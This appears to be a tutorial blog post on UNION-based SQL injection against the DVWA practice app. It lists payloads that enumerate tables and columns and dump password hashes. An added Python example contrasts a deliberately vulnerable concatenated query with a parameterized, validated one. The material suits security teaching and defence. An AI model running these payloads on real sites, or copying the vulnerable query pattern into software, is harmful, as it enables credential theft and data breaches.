SQL injection (2): UNION query injection process

 
 

Injection steps

  • Find the injection point and determine the character that closes the string
  • Determine the type of database
  • Guess the number of columns and find the echo (display) positions
  • Obtain basic information (such as: database name, database version, the current database name, etc.)
  • Get the database name
  • Get table name
  • Get the column name
  • Get the column values





    1' order by 3 --   (error)
    1' order by 1 --   (right)
    1' order by 2 --   (right; this determines the number of columns, here there are two)

    1' union select 1,2 --   (see the echo positions)

    1' union select user(),database() --   (see the database name)
    1' union select table_name,2 from information_schema.tables where table_schema=database() --   (see the tables)
    1' union select column_name,2 from information_schema.columns where table_name='users' --   (see the column names)
    1' union select group_concat(column_name),2 from information_schema.columns where table_name='users' --   (group_concat shows the data on a single line)

    -> In the DVWA database, the users table has the following columns:
       user_id, first_name, last_name, user, password, avatar, last_login, failed_login
    ---- At this point the database structure has been obtained. ----

    1' union select 1,group_concat(password) from users --
Some points to note about the commands:

  • information_schema.tables and information_schema.columns are tables in the information_schema database
  • table_schema: the database name
  • table_name: the name of a table inside the database
  • column_name: the name of a column in a database table
  • from has to come after the union select list
  • e.g. group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()
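Why the payloads above work and what stops them, as an added example that is not part of the original post. It assumes the lookup pastes the id between single quotes, and it uses an in-memory SQLite table with constructed rows as a stand-in for DVWA's MySQL users table; all function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the users table (SQLite in memory, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?)",
                   [(1, "admin", "admin", "hash-a"),      # constructed sample rows
                    (2, "Gordon", "Brown", "hash-b")])
    return db

def lookup_concat(db, user_id):
    """Vulnerable form: the input lands between the quotes, so a ' in the
    input closes the string and the rest is parsed as SQL."""
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = '"
           + user_id + "'")
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def lookup_strict(db, user_id):
    """Bound parameter plus validation: an id must consist of digits only."""
    if not user_id.isdigit():
        raise ValueError("user_id must be numeric")
    return lookup_bound(db, int(user_id))

# Last payload from the walkthrough above, used here as test input.
PAYLOAD = "1' union select 1,group_concat(password) from users -- "

if __name__ == "__main__":
    db = make_db()
    print("concat, id=1    :", lookup_concat(db, "1"))
    print("concat, payload :", lookup_concat(db, PAYLOAD))  # password column leaks
    print("bound, payload  :", lookup_bound(db, PAYLOAD))   # no rows match
    try:
        lookup_strict(db, PAYLOAD)
    except ValueError as exc:
        print("strict, payload : rejected,", exc)
```

With the bound form the whole payload is compared to user_id as a single string, so the quote never terminates anything and the union clause never runs.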

Origin www.cnblogs.com/difengblog/p/11886434.html